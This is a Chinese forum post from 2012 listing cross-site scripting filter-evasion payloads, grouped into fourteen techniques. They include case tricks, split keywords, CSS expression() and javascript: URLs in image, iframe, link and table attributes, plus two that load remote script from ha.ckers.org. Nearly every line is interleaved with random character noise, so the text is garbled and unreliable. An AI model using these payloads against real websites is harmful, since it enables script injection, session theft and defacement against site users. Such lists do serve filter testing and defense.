1. 改变字符大小写' \- [9 d9 r$ `# A. o' q d1 G
- D0 B7 _3 s( D6 H C z/ K, `4 D; F- l$ b
4 t+ f i/ w0 I* i2 P$ l+ z; O
<sCript>alert(‘d’)</scRipT>
2 q- j& p- I3 ~) a
, l- {; d3 a9 f9 w2. 利用多加一些其它字符来规避Regular Expression的检查
8 v. p% D0 ?2 d/ ^. ?: L
3 l6 R/ T, \5 [ <<script>alert(‘c’)//<</script>
. c7 I" u/ ]( L% A) p
A/ l# E5 o- Y$ m9 W <SCRIPT a=">" SRC="t.js"></SCRIPT>$ Y7 _! T6 g7 K! q* Q
" y6 @8 C7 b% F& n! P" B( k: s <SCRIPT =">" SRC="t.js"></SCRIPT>
/ K( }& ^) s, k6 L
# K" U( f1 i' V: S) `! @( E <SCRIPT a=">" ” SRC="t.js"></SCRIPT>, v; w+ w* T3 P! r
( |( ?5 c2 Z& V& i3 I6 ? <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>. g( d4 d, ?8 F* H+ b" o, i4 B
4 g b% m7 A6 l2 x6 G7 y <SCRIPT a=`>` SRC="t.js"></SCRIPT>8 E, E. ^3 [# u$ x2 F/ t
3 X6 _4 Q. I) V; ]+ @
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>2 I$ R3 C+ ?* u) L
9 \: [' \( r. \* q% B
3. 以其它扩展名取代.js
+ o2 {! C. G2 z7 R! M: u) C4 i. U% \
<script src="bad.jpg"></script>2 l! I# y0 C0 h9 y
. C& e! Z W7 p( x4. 将Javascript写在CSS档里% S3 a l) O" i
6 \9 n& [) H8 f z9 \5 I <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
$ H8 o8 F/ V1 w4 a' K3 O
: h, L& W2 B" b0 H example:
. z( u: ~2 X# a6 M3 z
: E5 T9 k! ]2 C2 x7 ? body {
, X$ t7 v7 M& u1 k, p+ g
/ Z! O8 `- K) B7 r/ x1 ^/ ?/ |0 q5 V# R background-image: url(‘javascript:alert("XSS");’)% i; F/ r$ Q7 E- X$ O# N
, u8 Q1 c- C$ d; W: r+ Q, l+ J }9 j2 |' O/ X+ T V* C
3 R ~5 A, k$ n( m2 H+ q
5. 在script的tag里加入一些其它字符
7 l" K" Q& T3 Z' J, Q; f1 H! Z5 l {' U5 ^) J" f: u
<SCRIPT/SRC="t.js"></SCRIPT>
+ z8 }4 [; I1 j1 E; l9 d' E
: G$ z2 G* T! |* U6 T4 o. P% L! [ <SCRIPT/anyword SRC="t.js"></SCRIPT>
W5 ]6 v6 r0 Y, q5 v% A8 G! F! Y0 C3 Q/ I: Y
6. 使用tab或是new line来规避+ h) P7 B: t7 G; a& f' T% a
( s) m- k; E" v' O9 V) N
<img src="jav ascr ipt:alert(‘XSS3′)">
3 t9 J( T$ R1 A& P: z! K0 q O, l7 w* b9 D, i$ c
<img src="jav ascr ipt:alert(‘XSS3′)">3 P/ ~. e- x# e3 B* C/ w
- S" c( r& T9 {; l/ K
<IMG SRC="jav ascript:alert(‘XSS’);">
: M+ u5 T1 r4 w7 m" ?1 x& `# B( ^* l8 E/ H& d" R9 `7 R
-> tag
: w/ o) N p1 ^2 n/ v7 I% t
: ]5 ?' t- Q* H! N, L0 R3 g" D -> new line+ g8 ?0 i5 q: a |
/ j" n9 k; z9 t4 w6 F
7. 使用"\"来规避8 y7 R+ }' u) q. R" d; o# T5 [. V% [
' s F3 d7 A8 d7 E* T6 P2 e, W
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
! s0 _$ y& Z& ?, t! f6 F4 J/ K2 F9 [# @; Y, E
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>6 }# y6 `8 U, {: w5 U- g: \; ?
8 y6 N( a3 F5 R
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
: N x5 t9 G5 [0 v+ ~: w i- H$ z1 S' t# \$ L r: w
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
: k) C& y5 f; M( I+ z
& J5 N2 W. e$ ?9 O9 u" L <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>8 }4 Z; f& N$ x" X! g' C- c
8 u s; O. o: ]2 ?; n7 J
8. 使用Hex encode来规避(也可能会把";"拿掉)" p' O4 a& o' C0 E" V& h
+ }/ V* ?8 v7 H# d2 t' N <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">* z( ^% R9 X) c9 r0 O9 i8 v U" s5 S
+ c' h3 C9 K3 G+ t2 N% i$ X 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
' G5 B( _4 h) N/ N! ~
7 F3 y! E6 `) H7 p) m( v9 U! v# s, Q <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
( D) S1 K/ r# q" r
& r% I: e' a2 k# U4 } Q 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">+ l4 w( V) X& ^* b) c: ?7 z
7 e: m5 ^8 e* N3 T% z
9. script in HTML tag# V5 G: m' {7 k5 [' X" v' p' B6 _
! i b$ X/ R3 s7 ~
<body onload=」alert(‘onload’)」>0 N: ^3 P& O) k- \, O2 {' J
0 Q: K: E. j, t: |' _4 [& q% q n onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload9 I% o2 H+ S2 G- x7 j" {
* ]! z- W$ c6 ^* T; [' o
10. 在swf里含有xss的code& c) P3 y5 b1 X- U0 k
; _* k8 i+ ?$ x) W2 P i0 X
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>7 C9 c- u0 v6 j% f2 v8 A
" w2 u, J" h% K2 R/ o7 q% {11. 利用CDATA将xss的code拆开,再组合起来。1 Q% a% U4 Z' L4 |" g3 Z; T
% Y/ W$ `( x# Z3 H, t
<XML ID=I><X><C>$ j) p& E7 ?! c5 ]) `
: M7 P! p o) F+ f <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
( k' }2 [* e7 Z6 k/ z6 \7 A, `6 B+ j+ g+ m, c4 ~7 f: S
</C></X>+ p7 J7 {3 a1 ]
- s* N6 ^0 G& z$ b% ?+ ~0 C </xml>
$ w" }* a# L7 R# o# }& K9 O# m$ o3 S2 z/ D, e
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
* f$ C H; n- P4 o: O4 N
9 C6 a9 b% v; w5 B <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>1 [! H3 `/ L. e2 X7 { }
& J( i( b' Y' ~ v <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>8 I: u) L& R( V' j" f% j
( i; A) G: d6 u: s( a: P6 V% W! e12. 利用HTML+TIME。
4 G) p" \, p( D& B4 k! ~$ K4 E( g- v/ i3 D3 O
<HTML><BODY>
7 [& V7 x1 X6 \7 K) u" n, S0 U/ V
" s1 f5 d( s+ | <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">) N+ q4 s8 K0 a" H E- [
& U, G2 V- E& R2 E <?import namespace="t" implementation="#default#time2">
% ]; k) n3 M( k! \ x5 e$ u8 u: B8 q1 s6 y3 h% ]
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">: X6 }0 _' o( \% J5 z6 a
$ W1 F8 O0 j& H w6 b6 c+ { </BODY></HTML>+ I# {* ~5 ` O$ J* \: Q% G
: N5 W" W8 k" ^. t4 f, d. t2 r$ |13. 透过META写入Cookie。, K" U) I; }8 r
9 q C" Q- _$ u: f5 F% y7 K
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
1 c' Y8 ~* P/ g* ~) I$ G
; N# p: |1 B4 M n9 O2 f14. javascript in src , href , url
& k4 ^- k5 w: V7 u
) c, B$ Z. P N+ ? <IFRAME SRC=javascript:alert(’13′)></IFRAME>
4 m2 v% ]" _, Y0 y! [6 P* U; U* Y' p; k. x! w Y
<img src="javascript:alert(‘XSS3′)">& c u* g3 ]6 H1 t% h6 U$ i$ b5 z
" ~( g9 B' e, C/ _; B/ b1 j<IMG DYNSRC="javascript:alert(‘XSS20′)">
! h* z2 \8 z5 J9 S0 A- t7 h# s4 _2 x) n9 Y% g' P
<IMG LOWSRC="javascript:alert(‘XSS21′)">* L2 D/ {+ V9 n6 r
4 ^/ F2 d/ t4 T' ` Q6 P1 k <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
* q- D% s8 G; K/ Y/ M
, i0 _% X. S! L <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>! s4 C1 M3 V: j8 U9 Z/ |' e
4 `6 C' P( i" U9 A( d <TABLE BACKGROUND="javascript:alert(‘XSS29′)">! _# ?" g' r0 e& j6 j
0 E8 Y, R. A: i7 z4 Q
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
8 `, @% Y/ y1 z! k$ m' D* B( ?2 a* S' |% l% L
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}9 @" g" f$ l0 O, D. A: y
4 C& b& W" Q7 P, Q+ W3 v( |
</STYLE><A CLASS=XSS></A> a+ c* L2 U1 s9 g2 y; D
5 Q/ d* x7 j- a <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>; z, q* j) c# H, W: c K# X) \) K
4 h: ~9 e2 p. a, g, k9 T2 k8 y |
发表于 2012-12-31 09:59:28
收藏
支持
反对